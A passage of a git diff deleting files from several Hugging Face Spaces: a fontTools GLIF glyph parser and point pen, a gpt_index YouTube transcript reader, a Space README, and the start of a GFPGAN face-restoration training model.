identifiers, validate - ) - elif glyphObject is None: - continue - elif element.tag == "advance": - if validate and haveSeenAdvance: - raise GlifLibError("The advance element occurs more than once.") - haveSeenAdvance = True - _readAdvance(glyphObject, element) - elif element.tag == "unicode": - try: - v = element.get("hex") - v = int(v, 16) - if v not in unicodes: - unicodes.append(v) - except ValueError: - raise GlifLibError( - "Illegal value for hex attribute of unicode element." - ) - elif element.tag == "guideline": - if validate and len(element): - raise GlifLibError("Unknown children in guideline element.") - attrib = dict(element.attrib) - for attr in ("x", "y", "angle"): - if attr in attrib: - attrib[attr] = _number(attrib[attr]) - guidelines.append(attrib) - elif element.tag == "anchor": - if validate and len(element): - raise GlifLibError("Unknown children in anchor element.") - attrib = dict(element.attrib) - for attr in ("x", "y"): - if attr in element.attrib: - attrib[attr] = _number(attrib[attr]) - anchors.append(attrib) - elif element.tag == "image": - if validate: - if haveSeenImage: - raise GlifLibError("The image element occurs more than once.") - if len(element): - raise GlifLibError("Unknown children in image element.") - haveSeenImage = True - _readImage(glyphObject, element, validate) - elif element.tag == "note": - if validate and haveSeenNote: - raise GlifLibError("The note element occurs more than once.") - haveSeenNote = True - _readNote(glyphObject, element) - elif element.tag == "lib": - if validate and haveSeenLib: - raise GlifLibError("The lib element occurs more than once.") - haveSeenLib = True - _readLib(glyphObject, element, validate) - else: - raise GlifLibError("Unknown element in GLIF: %s" % element) - # set the collected unicodes - if unicodes: - _relaxedSetattr(glyphObject, "unicodes", unicodes) - # set the collected guidelines - if guidelines: - if validate and not guidelinesValidator(guidelines, identifiers): - raise GlifLibError("The guidelines are improperly formatted.") - _relaxedSetattr(glyphObject, "guidelines", guidelines) - # set the collected anchors - if anchors: - if validate and not anchorsValidator(anchors, identifiers): - raise GlifLibError("The anchors are improperly formatted.") - _relaxedSetattr(glyphObject, "anchors", anchors) - - -_READ_GLYPH_FROM_TREE_FUNCS = { - GLIFFormatVersion.FORMAT_1_0: _readGlyphFromTreeFormat1, - GLIFFormatVersion.FORMAT_2_0: _readGlyphFromTreeFormat2, -} - - -def _readName(glyphObject, root, validate): - glyphName = root.get("name") - if validate and not glyphName: - raise GlifLibError("Empty glyph name in GLIF.") - if glyphName and glyphObject is not None: - _relaxedSetattr(glyphObject, "name", glyphName) - - -def _readAdvance(glyphObject, advance): - width = _number(advance.get("width", 0)) - _relaxedSetattr(glyphObject, "width", width) - height = _number(advance.get("height", 0)) - _relaxedSetattr(glyphObject, "height", height) - - -def _readNote(glyphObject, note): - lines = note.text.split("\n") - note = "\n".join(line.strip() for line in lines if line.strip()) - _relaxedSetattr(glyphObject, "note", note) - - -def _readLib(glyphObject, lib, validate): - assert len(lib) == 1 - child = lib[0] - plist = plistlib.fromtree(child) - if validate: - valid, message = glyphLibValidator(plist) - if not valid: - raise GlifLibError(message) - _relaxedSetattr(glyphObject, "lib", plist) - - -def _readImage(glyphObject, image, validate): - imageData = dict(image.attrib) - for attr, default in _transformationInfo: - value = imageData.get(attr, default) - imageData[attr] = _number(value) - if validate and not imageValidator(imageData): - raise GlifLibError("The image element is not properly formatted.") - _relaxedSetattr(glyphObject, "image", imageData) - - -# ---------------- -# GLIF to PointPen -# ---------------- - -contourAttributesFormat2 = {"identifier"} -componentAttributesFormat1 = { - "base", - "xScale", - "xyScale", - "yxScale", - "yScale", - "xOffset", - "yOffset", -} -componentAttributesFormat2 = componentAttributesFormat1 | {"identifier"} -pointAttributesFormat1 = {"x", "y", "type", "smooth", "name"} -pointAttributesFormat2 = pointAttributesFormat1 | {"identifier"} -pointSmoothOptions = {"no", "yes"} -pointTypeOptions = {"move", "line", "offcurve", "curve", "qcurve"} - -# format 1 - - -def buildOutlineFormat1(glyphObject, pen, outline, validate): - anchors = [] - for element in outline: - if element.tag == "contour": - if len(element) == 1: - point = element[0] - if point.tag == "point": - anchor = _buildAnchorFormat1(point, validate) - if anchor is not None: - anchors.append(anchor) - continue - if pen is not None: - _buildOutlineContourFormat1(pen, element, validate) - elif element.tag == "component": - if pen is not None: - _buildOutlineComponentFormat1(pen, element, validate) - else: - raise GlifLibError("Unknown element in outline element: %s" % element) - if glyphObject is not None and anchors: - if validate and not anchorsValidator(anchors): - raise GlifLibError("GLIF 1 anchors are not properly formatted.") - _relaxedSetattr(glyphObject, "anchors", anchors) - - -def _buildAnchorFormat1(point, validate): - if point.get("type") != "move": - return None - name = point.get("name") - if name is None: - return None - x = point.get("x") - y = point.get("y") - if validate and x is None: - raise GlifLibError("Required x attribute is missing in point element.") - if validate and y is None: - raise GlifLibError("Required y attribute is missing in point element.") - x = _number(x) - y = _number(y) - anchor = dict(x=x, y=y, name=name) - return anchor - - -def _buildOutlineContourFormat1(pen, contour, validate): - if validate and contour.attrib: - raise GlifLibError("Unknown attributes in contour element.") - pen.beginPath() - if len(contour): - massaged = _validateAndMassagePointStructures( - contour, - pointAttributesFormat1, - openContourOffCurveLeniency=True, - validate=validate, - ) - _buildOutlinePointsFormat1(pen, massaged) - pen.endPath() - - -def _buildOutlinePointsFormat1(pen, contour): - for point in contour: - x = point["x"] - y = point["y"] - segmentType = point["segmentType"] - smooth = point["smooth"] - name = point["name"] - pen.addPoint((x, y), segmentType=segmentType, smooth=smooth, name=name) - - -def _buildOutlineComponentFormat1(pen, component, validate): - if validate: - if len(component): - raise GlifLibError("Unknown child elements of component element.") - for attr in component.attrib.keys(): - if attr not in componentAttributesFormat1: - raise GlifLibError("Unknown attribute in component element: %s" % attr) - baseGlyphName = component.get("base") - if validate and baseGlyphName is None: - raise GlifLibError("The base attribute is not defined in the component.") - transformation = [] - for attr, default in _transformationInfo: - value = component.get(attr) - if value is None: - value = default - else: - value = _number(value) - transformation.append(value) - pen.addComponent(baseGlyphName, tuple(transformation)) - - -# format 2 - - -def buildOutlineFormat2(glyphObject, pen, outline, identifiers, validate): - for element in outline: - if element.tag == "contour": - _buildOutlineContourFormat2(pen, element, identifiers, validate) - elif element.tag == "component": - _buildOutlineComponentFormat2(pen, element, identifiers, validate) - else: - raise GlifLibError("Unknown element in outline element: %s" % element.tag) - - -def _buildOutlineContourFormat2(pen, contour, identifiers, validate): - if validate: - for attr in contour.attrib.keys(): - if attr not in contourAttributesFormat2: - raise GlifLibError("Unknown attribute in contour element: %s" % attr) - identifier = contour.get("identifier") - if identifier is not None: - if validate: - if identifier in identifiers: - raise GlifLibError( - "The identifier %s is used more than once." % identifier - ) - if not identifierValidator(identifier): - raise GlifLibError( - "The contour identifier %s is not valid." % identifier - ) - identifiers.add(identifier) - try: - pen.beginPath(identifier=identifier) - except TypeError: - pen.beginPath() - warn( - "The beginPath method needs an identifier kwarg. The contour's identifier value has been discarded.", - DeprecationWarning, - ) - if len(contour): - massaged = _validateAndMassagePointStructures( - contour, pointAttributesFormat2, validate=validate - ) - _buildOutlinePointsFormat2(pen, massaged, identifiers, validate) - pen.endPath() - - -def _buildOutlinePointsFormat2(pen, contour, identifiers, validate): - for point in contour: - x = point["x"] - y = point["y"] - segmentType = point["segmentType"] - smooth = point["smooth"] - name = point["name"] - identifier = point.get("identifier") - if identifier is not None: - if validate: - if identifier in identifiers: - raise GlifLibError( - "The identifier %s is used more than once." % identifier - ) - if not identifierValidator(identifier): - raise GlifLibError("The identifier %s is not valid." % identifier) - identifiers.add(identifier) - try: - pen.addPoint( - (x, y), - segmentType=segmentType, - smooth=smooth, - name=name, - identifier=identifier, - ) - except TypeError: - pen.addPoint((x, y), segmentType=segmentType, smooth=smooth, name=name) - warn( - "The addPoint method needs an identifier kwarg. The point's identifier value has been discarded.", - DeprecationWarning, - ) - - -def _buildOutlineComponentFormat2(pen, component, identifiers, validate): - if validate: - if len(component): - raise GlifLibError("Unknown child elements of component element.") - for attr in component.attrib.keys(): - if attr not in componentAttributesFormat2: - raise GlifLibError("Unknown attribute in component element: %s" % attr) - baseGlyphName = component.get("base") - if validate and baseGlyphName is None: - raise GlifLibError("The base attribute is not defined in the component.") - transformation = [] - for attr, default in _transformationInfo: - value = component.get(attr) - if value is None: - value = default - else: - value = _number(value) - transformation.append(value) - identifier = component.get("identifier") - if identifier is not None: - if validate: - if identifier in identifiers: - raise GlifLibError( - "The identifier %s is used more than once." % identifier - ) - if validate and not identifierValidator(identifier): - raise GlifLibError("The identifier %s is not valid." % identifier) - identifiers.add(identifier) - try: - pen.addComponent(baseGlyphName, tuple(transformation), identifier=identifier) - except TypeError: - pen.addComponent(baseGlyphName, tuple(transformation)) - warn( - "The addComponent method needs an identifier kwarg. The component's identifier value has been discarded.", - DeprecationWarning, - ) - - -# all formats - - -def _validateAndMassagePointStructures( - contour, pointAttributes, openContourOffCurveLeniency=False, validate=True -): - if not len(contour): - return - # store some data for later validation - lastOnCurvePoint = None - haveOffCurvePoint = False - # validate and massage the individual point elements - massaged = [] - for index, element in enumerate(contour): - # not - if element.tag != "point": - raise GlifLibError( - "Unknown child element (%s) of contour element." % element.tag - ) - point = dict(element.attrib) - massaged.append(point) - if validate: - # unknown attributes - for attr in point.keys(): - if attr not in pointAttributes: - raise GlifLibError("Unknown attribute in point element: %s" % attr) - # search for unknown children - if len(element): - raise GlifLibError("Unknown child elements in point element.") - # x and y are required - for attr in ("x", "y"): - try: - point[attr] = _number(point[attr]) - except KeyError as e: - raise GlifLibError( - f"Required {attr} attribute is missing in point element." - ) from e - # segment type - pointType = point.pop("type", "offcurve") - if validate and pointType not in pointTypeOptions: - raise GlifLibError("Unknown point type: %s" % pointType) - if pointType == "offcurve": - pointType = None - point["segmentType"] = pointType - if pointType is None: - haveOffCurvePoint = True - else: - lastOnCurvePoint = index - # move can only occur as the first point - if validate and pointType == "move" and index != 0: - raise GlifLibError( - "A move point occurs after the first point in the contour." - ) - # smooth is optional - smooth = point.get("smooth", "no") - if validate and smooth is not None: - if smooth not in pointSmoothOptions: - raise GlifLibError("Unknown point smooth value: %s" % smooth) - smooth = smooth == "yes" - point["smooth"] = smooth - # smooth can only be applied to curve and qcurve - if validate and smooth and pointType is None: - raise GlifLibError("smooth attribute set in an offcurve point.") - # name is optional - if "name" not in element.attrib: - point["name"] = None - if openContourOffCurveLeniency: - # remove offcurves that precede a move. this is technically illegal, - # but we let it slide because there are fonts out there in the wild like this. - if massaged[0]["segmentType"] == "move": - count = 0 - for point in reversed(massaged): - if point["segmentType"] is None: - count += 1 - else: - break - if count: - massaged = massaged[:-count] - # validate the off-curves in the segments - if validate and haveOffCurvePoint and lastOnCurvePoint is not None: - # we only care about how many offCurves there are before an onCurve - # filter out the trailing offCurves - offCurvesCount = len(massaged) - 1 - lastOnCurvePoint - for point in massaged: - segmentType = point["segmentType"] - if segmentType is None: - offCurvesCount += 1 - else: - if offCurvesCount: - # move and line can't be preceded by off-curves - if segmentType == "move": - # this will have been filtered out already - raise GlifLibError("move can not have an offcurve.") - elif segmentType == "line": - raise GlifLibError("line can not have an offcurve.") - elif segmentType == "curve": - if offCurvesCount > 2: - raise GlifLibError("Too many offcurves defined for curve.") - elif segmentType == "qcurve": - pass - else: - # unknown segment type. it'll be caught later. - pass - offCurvesCount = 0 - return massaged - - -# --------------------- -# Misc Helper Functions -# --------------------- - - -def _relaxedSetattr(object, attr, value): - try: - setattr(object, attr, value) - except AttributeError: - pass - - -def _number(s): - """ - Given a numeric string, return an integer or a float, whichever - the string indicates. _number("1") will return the integer 1, - _number("1.0") will return the float 1.0. - - >>> _number("1") - 1 - >>> _number("1.0") - 1.0 - >>> _number("a") # doctest: +IGNORE_EXCEPTION_DETAIL - Traceback (most recent call last): - ... - GlifLibError: Could not convert a to an int or float. - """ - try: - n = int(s) - return n - except ValueError: - pass - try: - n = float(s) - return n - except ValueError: - raise GlifLibError("Could not convert %s to an int or float." % s) - - -# -------------------- -# Rapid Value Fetching -# -------------------- - -# base - - -class _DoneParsing(Exception): - pass - - -class _BaseParser: - def __init__(self): - self._elementStack = [] - - def parse(self, text): - from xml.parsers.expat import ParserCreate - - parser = ParserCreate() - parser.StartElementHandler = self.startElementHandler - parser.EndElementHandler = self.endElementHandler - parser.Parse(text) - - def startElementHandler(self, name, attrs): - self._elementStack.append(name) - - def endElementHandler(self, name): - other = self._elementStack.pop(-1) - assert other == name - - -# unicodes - - -def _fetchUnicodes(glif): - """ - Get a list of unicodes listed in glif. - """ - parser = _FetchUnicodesParser() - parser.parse(glif) - return parser.unicodes - - -class _FetchUnicodesParser(_BaseParser): - def __init__(self): - self.unicodes = [] - super().__init__() - - def startElementHandler(self, name, attrs): - if ( - name == "unicode" - and self._elementStack - and self._elementStack[-1] == "glyph" - ): - value = attrs.get("hex") - if value is not None: - try: - value = int(value, 16) - if value not in self.unicodes: - self.unicodes.append(value) - except ValueError: - pass - super().startElementHandler(name, attrs) - - -# image - - -def _fetchImageFileName(glif): - """ - The image file name (if any) from glif. - """ - parser = _FetchImageFileNameParser() - try: - parser.parse(glif) - except _DoneParsing: - pass - return parser.fileName - - -class _FetchImageFileNameParser(_BaseParser): - def __init__(self): - self.fileName = None - super().__init__() - - def startElementHandler(self, name, attrs): - if name == "image" and self._elementStack and self._elementStack[-1] == "glyph": - self.fileName = attrs.get("fileName") - raise _DoneParsing - super().startElementHandler(name, attrs) - - -# component references - - -def _fetchComponentBases(glif): - """ - Get a list of component base glyphs listed in glif. - """ - parser = _FetchComponentBasesParser() - try: - parser.parse(glif) - except _DoneParsing: - pass - return list(parser.bases) - - -class _FetchComponentBasesParser(_BaseParser): - def __init__(self): - self.bases = [] - super().__init__() - - def startElementHandler(self, name, attrs): - if ( - name == "component" - and self._elementStack - and self._elementStack[-1] == "outline" - ): - base = attrs.get("base") - if base is not None: - self.bases.append(base) - super().startElementHandler(name, attrs) - - def endElementHandler(self, name): - if name == "outline": - raise _DoneParsing - super().endElementHandler(name) - - -# -------------- -# GLIF Point Pen -# -------------- - -_transformationInfo = [ - # field name, default value - ("xScale", 1), - ("xyScale", 0), - ("yxScale", 0), - ("yScale", 1), - ("xOffset", 0), - ("yOffset", 0), -] - - -class GLIFPointPen(AbstractPointPen): - - """ - Helper class using the PointPen protocol to write the - part of .glif files. - """ - - def __init__(self, element, formatVersion=None, identifiers=None, validate=True): - if identifiers is None: - identifiers = set() - self.formatVersion = GLIFFormatVersion(formatVersion) - self.identifiers = identifiers - self.outline = element - self.contour = None - self.prevOffCurveCount = 0 - self.prevPointTypes = [] - self.validate = validate - - def beginPath(self, identifier=None, **kwargs): - attrs = OrderedDict() - if identifier is not None and self.formatVersion.major >= 2: - if self.validate: - if identifier in self.identifiers: - raise GlifLibError( - "identifier used more than once: %s" % identifier - ) - if not identifierValidator(identifier): - raise GlifLibError( - "identifier not formatted properly: %s" % identifier - ) - attrs["identifier"] = identifier - self.identifiers.add(identifier) - self.contour = etree.SubElement(self.outline, "contour", attrs) - self.prevOffCurveCount = 0 - - def endPath(self): - if self.prevPointTypes and self.prevPointTypes[0] == "move": - if self.validate and self.prevPointTypes[-1] == "offcurve": - raise GlifLibError("open contour has loose offcurve point") - # prevent lxml from writing self-closing tags - if not len(self.contour): - self.contour.text = "\n " - self.contour = None - self.prevPointType = None - self.prevOffCurveCount = 0 - self.prevPointTypes = [] - - def addPoint( - self, pt, segmentType=None, smooth=None, name=None, identifier=None, **kwargs - ): - attrs = OrderedDict() - # coordinates - if pt is not None: - if self.validate: - for coord in pt: - if not isinstance(coord, numberTypes): - raise GlifLibError("coordinates must be int or float") - attrs["x"] = repr(pt[0]) - attrs["y"] = repr(pt[1]) - # segment type - if segmentType == "offcurve": - segmentType = None - if self.validate: - if segmentType == "move" and self.prevPointTypes: - raise GlifLibError( - "move occurs after a point has already been added to the contour." - ) - if ( - segmentType in ("move", "line") - and self.prevPointTypes - and self.prevPointTypes[-1] == "offcurve" - ): - raise GlifLibError("offcurve occurs before %s point." % segmentType) - if segmentType == "curve" and self.prevOffCurveCount > 2: - raise GlifLibError("too many offcurve points before curve point.") - if segmentType is not None: - attrs["type"] = segmentType - else: - segmentType = "offcurve" - if segmentType == "offcurve": - self.prevOffCurveCount += 1 - else: - self.prevOffCurveCount = 0 - self.prevPointTypes.append(segmentType) - # smooth - if smooth: - if self.validate and segmentType == "offcurve": - raise GlifLibError("can't set smooth in an offcurve point.") - attrs["smooth"] = "yes" - # name - if name is not None: - attrs["name"] = name - # identifier - if identifier is not None and self.formatVersion.major >= 2: - if self.validate: - if identifier in self.identifiers: - raise GlifLibError( - "identifier used more than once: %s" % identifier - ) - if not identifierValidator(identifier): - raise GlifLibError( - "identifier not formatted properly: %s" % identifier - ) - attrs["identifier"] = identifier - self.identifiers.add(identifier) - etree.SubElement(self.contour, "point", attrs) - - def addComponent(self, glyphName, transformation, identifier=None, **kwargs): - attrs = OrderedDict([("base", glyphName)]) - for (attr, default), value in zip(_transformationInfo, transformation): - if self.validate and not isinstance(value, numberTypes): - raise GlifLibError("transformation values must be int or float") - if value != default: - attrs[attr] = repr(value) - if identifier is not None and self.formatVersion.major >= 2: - if self.validate: - if identifier in self.identifiers: - raise GlifLibError( - "identifier used more than once: %s" % identifier - ) - if self.validate and not identifierValidator(identifier): - raise GlifLibError( - "identifier not formatted properly: %s" % identifier - ) - attrs["identifier"] = identifier - self.identifiers.add(identifier) - etree.SubElement(self.outline, "component", attrs) - - -if __name__ == "__main__": - import doctest - - doctest.testmod() diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/gpt_index/readers/youtube_transcript.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/gpt_index/readers/youtube_transcript.py deleted file mode 100644 index a67e9f96fb57ac6075eb5fa36bb7cf0ae2323c51..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/gpt_index/readers/youtube_transcript.py +++ /dev/null @@ -1,38 +0,0 @@ -"""Simple Reader that reads transcript of youtube video.""" -from typing import Any, List - -from gpt_index.readers.base import BaseReader -from gpt_index.readers.schema.base import Document - - -class YoutubeTranscriptReader(BaseReader): - """Youtube Transcript reader.""" - - def __init__(self) -> None: - """Initialize with parameters.""" - - def load_data(self, ytlinks: List[str], **load_kwargs: Any) -> List[Document]: - """Load data from the input directory. - - Args: - pages (List[str]): List of youtube links \ - for which transcripts are to be read. - - """ - try: - from youtube_transcript_api import YouTubeTranscriptApi - except ImportError: - raise ImportError( - "`youtube_transcript_api` package not found, \ - please run `pip install youtube-transcript-api`" - ) - - results = [] - for link in ytlinks: - video_id = link.split("?v=")[-1] - srt = YouTubeTranscriptApi.get_transcript(video_id) - transcript = "" - for chunk in srt: - transcript = transcript + chunk["text"] + "\n" - results.append(Document(transcript)) - return results diff --git a/spaces/joey1895/tsspace01/README.md b/spaces/joey1895/tsspace01/README.md deleted file mode 100644 index b12be5464572fbb7e5703b42383c06738593ce7c..0000000000000000000000000000000000000000 --- a/spaces/joey1895/tsspace01/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Hotdog Gradio -emoji: 🦀 -colorFrom: purple -colorTo: purple -sdk: gradio -sdk_version: 3.1.7 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference \ No newline at end of file diff --git a/spaces/jone/GFPGAN/gfpgan/models/gfpgan_model.py b/spaces/jone/GFPGAN/gfpgan/models/gfpgan_model.py deleted file mode 100644 index 00f3e3ad04f61189508ead2f0ba5561941fd4fe3..0000000000000000000000000000000000000000 --- a/spaces/jone/GFPGAN/gfpgan/models/gfpgan_model.py +++ /dev/null @@ -1,580 +0,0 @@ -import math -import os.path as osp -import torch -from basicsr.archs import build_network -from basicsr.losses import build_loss -from basicsr.losses.gan_loss import r1_penalty -from basicsr.metrics import calculate_metric -from basicsr.models.base_model import BaseModel -from basicsr.utils import get_root_logger, imwrite, tensor2img -from basicsr.utils.registry import MODEL_REGISTRY -from collections import OrderedDict -from torch.nn import functional as F -from torchvision.ops import roi_align -from tqdm import tqdm - - -@MODEL_REGISTRY.register() -class GFPGANModel(BaseModel): - """The GFPGAN model for Towards real-world blind face restoratin with generative facial prior""" - - def __init__(self, opt): - super(GFPGANModel, self).__init__(opt) - self.idx = 0 # it is used for saving data for check - - # define network - self.net_g = build_network(opt['network_g']) - self.net_g = self.model_to_device(self.net_g) - self.print_network(self.net_g) - - # load pretrained model - load_path = self.opt['path'].get('pretrain_network_g', None) - if load_path is not None: - param_key = self.opt['path'].get('param_key_g', 'params') - self.load_network(self.net_g, load_path, self.opt['path'].get('strict_load_g', True), param_key) - - self.log_size = int(math.log(self.opt['network_g']['out_size'], 2)) - - if self.is_train: - self.init_training_settings() - - def init_training_settings(self): - train_opt = self.opt['train'] - - # ----------- define net_d ----------- # - self.net_d = build_network(self.opt['network_d']) - self.net_d = self.model_to_device(self.net_d) - self.print_network(self.net_d) - # load pretrained model - load_path = self.opt['path'].get('pretrain_network_d', None) - if load_path is not None: - self.load_network(self.net_d, load_path, self.opt['path'].get('strict_load_d', True)) - - # ----------- define net_g with Exponential Moving Average (EMA) ----------- # - # net_g_ema only used for testing on one GPU and saving. There is no need to wrap with DistributedDataParallel - self.net_g_ema = build_network(self.opt['network_g']).to(self.device) - # load pretrained model - load_path = self.opt['path'].get('pretrain_network_g', None) - if load_path is not None: - self.load_network(self.net_g_ema, load_path, self.opt['path'].get('strict_load_g', True), 'params_ema') - else: - self.model_ema(0) # copy net_g weight - - self.net_g.train() - self.net_d.train() - self.net_g_ema.eval() - - # ----------- facial component networks ----------- # - if ('network_d_left_eye' in self.opt and 'network_d_right_eye' in self.opt and 'network_d_mouth' in self.opt): - self.use_facial_disc = True - else: - self.use_facial_disc = False - - if self.use_facial_disc: - # left eye - self.net_d_left_eye = build_network(self.opt['network_d_left_eye']) - self.net_d_left_eye = self.model_to_device(self.net_d_left_eye) - self.print_network(self.net_d_left_eye) - load_path = self.opt['path'].get('pretrain_network_d_left_eye') - if load_path is not None: - self.load_network(self.net_d_left_eye, load_path, True, 'params') - # right eye - self.net_d_right_eye = build_network(self.opt['network_d_right_eye']) - self.net_d_right_eye = self.model_to_device(self.net_d_right_eye) - self.print_network(self.net_d_right_eye) - load_path = self.opt['path'].get('pretrain_network_d_right_eye') - if load_path is not None: - self.load_network(self.net_d_right_eye, load_path, True, 'params') - # mouth - self.net_d_mouth = build_network(self.opt['network_d_mouth']) - self.net_d_mouth = self.model_to_device(self.net_d_mouth) - self.print_network(self.net_d_mouth) - load_path = self.opt['path'].get('pretrain_network_d_mouth') - if load_path is not None: - self.load_network(self.net_d_mouth, load_path, True, 'params') - - self.net_d_left_eye.train() - self.net_d_right_eye.train() - self.net_d_mouth.train() - - # ----------- define facial component gan loss ----------- # - self.cri_component = build_loss(train_opt['gan_component_opt']).to(self.device) - - # ----------- define losses ----------- # - # pixel loss - if train_opt.get('pixel_opt'): - self.cri_pix = build_loss(train_opt['pixel_opt']).to(self.device) - else: - self.cri_pix = None - - # perceptual loss - if train_opt.get('perceptual_opt'): - self.cri_perceptual = build_loss(train_opt['perceptual_opt']).to(self.device) - else: - self.cri_perceptual = None - - # L1 loss is used in pyramid loss, component style loss and identity loss - self.cri_l1 = build_loss(train_opt['L1_opt']).to(self.device) - - # gan loss (wgan) - self.cri_gan = build_loss(train_opt['gan_opt']).to(self.device) - - # ----------- define identity loss ----------- # - if 'network_identity' in self.opt: - self.use_identity = True - else: - self.use_identity = False - - if self.use_identity: - # define identity network - self.network_identity = build_network(self.opt['network_identity']) - self.network_identity = self.model_to_device(self.network_identity) - self.print_network(self.network_identity) - load_path = self.opt['path'].get('pretrain_network_identity') - if load_path is not None: - self.load_network(self.network_identity, load_path, True, None) - self.network_identity.eval() - for param in self.network_identity.parameters(): - param.requires_grad = False - - # regularization weights - self.r1_reg_weight = train_opt['r1_reg_weight'] # for discriminator - self.net_d_iters = train_opt.get('net_d_iters', 1) - self.net_d_init_iters = train_opt.get('net_d_init_iters', 0) - self.net_d_reg_every = train_opt['net_d_reg_every'] - - # set up optimizers and schedulers - self.setup_optimizers() - self.setup_schedulers() - - def setup_optimizers(self): - train_opt = self.opt['train'] - - # ----------- optimizer g ----------- # - net_g_reg_ratio = 1 - normal_params = [] - for _, param in self.net_g.named_parameters(): - normal_params.append(param) - optim_params_g = [{ # add normal params first - 'params': normal_params, - 'lr': train_opt['optim_g']['lr'] - }] - optim_type = train_opt['optim_g'].pop('type') - lr = train_opt['optim_g']['lr'] * net_g_reg_ratio - betas = (0**net_g_reg_ratio, 0.99**net_g_reg_ratio) - self.optimizer_g = self.get_optimizer(optim_type, optim_params_g, lr, betas=betas) - self.optimizers.append(self.optimizer_g) - - # ----------- optimizer d ----------- # - net_d_reg_ratio = self.net_d_reg_every / (self.net_d_reg_every + 1) - normal_params = [] - for _, param in self.net_d.named_parameters(): - normal_params.append(param) - optim_params_d = [{ # add normal params first - 'params': normal_params, - 'lr': train_opt['optim_d']['lr'] - }] - optim_type = train_opt['optim_d'].pop('type') - lr = train_opt['optim_d']['lr'] * net_d_reg_ratio - betas = (0**net_d_reg_ratio, 0.99**net_d_reg_ratio) - self.optimizer_d = self.get_optimizer(optim_type, optim_params_d, lr, betas=betas) - self.optimizers.append(self.optimizer_d) - - # ----------- optimizers for facial component networks ----------- # - if self.use_facial_disc: - # setup optimizers for facial component discriminators - optim_type = train_opt['optim_component'].pop('type') - lr = train_opt['optim_component']['lr'] - # left eye - self.optimizer_d_left_eye = self.get_optimizer( - optim_type, self.net_d_left_eye.parameters(), lr, betas=(0.9, 0.99)) - self.optimizers.append(self.optimizer_d_left_eye) - # right eye - self.optimizer_d_right_eye = self.get_optimizer( - optim_type, self.net_d_right_eye.parameters(), lr, betas=(0.9, 0.99)) - self.optimizers.append(self.optimizer_d_right_eye) - # mouth - self.optimizer_d_mouth = self.get_optimizer( - optim_type, self.net_d_mouth.parameters(), lr, betas=(0.9, 0.99)) - self.optimizers.append(self.optimizer_d_mouth) - - def feed_data(self, data): - self.lq = data['lq'].to(self.device) - if 'gt' in data: - self.gt = data['gt'].to(self.device) - - if 'loc_left_eye' in data: - # get facial component locations, shape (batch, 4) - self.loc_left_eyes = data['loc_left_eye'] - self.loc_right_eyes = data['loc_right_eye'] - self.loc_mouths = data['loc_mouth'] - - # uncomment to check data - # import torchvision - # if self.opt['rank'] == 0: - # import os - # os.makedirs('tmp/gt', exist_ok=True) - # os.makedirs('tmp/lq', exist_ok=True) - # print(self.idx) - # torchvision.utils.save_image( - # self.gt, f'tmp/gt/gt_{self.idx}.png', nrow=4, padding=2, normalize=True, range=(-1, 1)) - # torchvision.utils.save_image( - # self.lq, f'tmp/lq/lq{self.idx}.png', nrow=4, padding=2, normalize=True, range=(-1, 1)) - # self.idx = self.idx + 1 - - def construct_img_pyramid(self): - """Construct image pyramid for intermediate restoration loss""" - pyramid_gt = [self.gt] - down_img = self.gt - for _ in range(0, self.log_size - 3): - down_img = F.interpolate(down_img, scale_factor=0.5, mode='bilinear', align_corners=False) - pyramid_gt.insert(0, down_img) - return pyramid_gt - - def get_roi_regions(self, eye_out_size=80, mouth_out_size=120): - face_ratio = int(self.opt['network_g']['out_size'] / 512) - eye_out_size *= face_ratio - mouth_out_size *= face_ratio - - rois_eyes = [] - rois_mouths = [] - for b in range(self.loc_left_eyes.size(0)): # loop for batch size - # left eye and right eye - img_inds = self.loc_left_eyes.new_full((2, 1), b) - bbox = torch.stack([self.loc_left_eyes[b, :], self.loc_right_eyes[b, :]], dim=0) # shape: (2, 4) - rois = torch.cat([img_inds, bbox], dim=-1) # shape: (2, 5) - rois_eyes.append(rois) - # mouse - img_inds = self.loc_left_eyes.new_full((1, 1), b) - rois = torch.cat([img_inds, self.loc_mouths[b:b + 1, :]], dim=-1) # shape: (1, 5) - rois_mouths.append(rois) - - rois_eyes = torch.cat(rois_eyes, 0).to(self.device) - rois_mouths = torch.cat(rois_mouths, 0).to(self.device) - - # real images - all_eyes = roi_align(self.gt, boxes=rois_eyes, output_size=eye_out_size) * face_ratio - self.left_eyes_gt = all_eyes[0::2, :, :, :] - self.right_eyes_gt = all_eyes[1::2, :, :, :] - self.mouths_gt = roi_align(self.gt, boxes=rois_mouths, output_size=mouth_out_size) * face_ratio - # output - all_eyes = roi_align(self.output, boxes=rois_eyes, output_size=eye_out_size) * face_ratio - self.left_eyes = all_eyes[0::2, :, :, :] - self.right_eyes = all_eyes[1::2, :, :, :] - self.mouths = roi_align(self.output, boxes=rois_mouths, output_size=mouth_out_size) * face_ratio - - def _gram_mat(self, x): - """Calculate Gram matrix. - - Args: - x (torch.Tensor): Tensor with shape of (n, c, h, w). - - Returns: - torch.Tensor: Gram matrix. - """ - n, c, h, w = x.size() - features = x.view(n, c, w * h) - features_t = features.transpose(1, 2) - gram = features.bmm(features_t) / (c * h * w) - return gram - - def gray_resize_for_identity(self, out, size=128): - out_gray = (0.2989 * out[:, 0, :, :] + 0.5870 * out[:, 1, :, :] + 0.1140 * out[:, 2, :, :]) - out_gray = out_gray.unsqueeze(1) - out_gray = F.interpolate(out_gray, (size, size), mode='bilinear', align_corners=False) - return out_gray - - def optimize_parameters(self, current_iter): - # optimize net_g - for p in self.net_d.parameters(): - p.requires_grad = False - self.optimizer_g.zero_grad() - - # do not update facial component net_d - if self.use_facial_disc: - for p in self.net_d_left_eye.parameters(): - p.requires_grad = False - for p in self.net_d_right_eye.parameters(): - p.requires_grad = False - for p in self.net_d_mouth.parameters(): - p.requires_grad = False - - # image pyramid loss weight - if current_iter < self.opt['train'].get('remove_pyramid_loss', float('inf')): - pyramid_loss_weight = self.opt['train'].get('pyramid_loss_weight', 1) - else: - pyramid_loss_weight = 1e-12 # very small loss - if pyramid_loss_weight > 0: - self.output, out_rgbs = self.net_g(self.lq, return_rgb=True) - pyramid_gt = self.construct_img_pyramid() - else: - self.output, out_rgbs = self.net_g(self.lq, return_rgb=False) - - # get roi-align 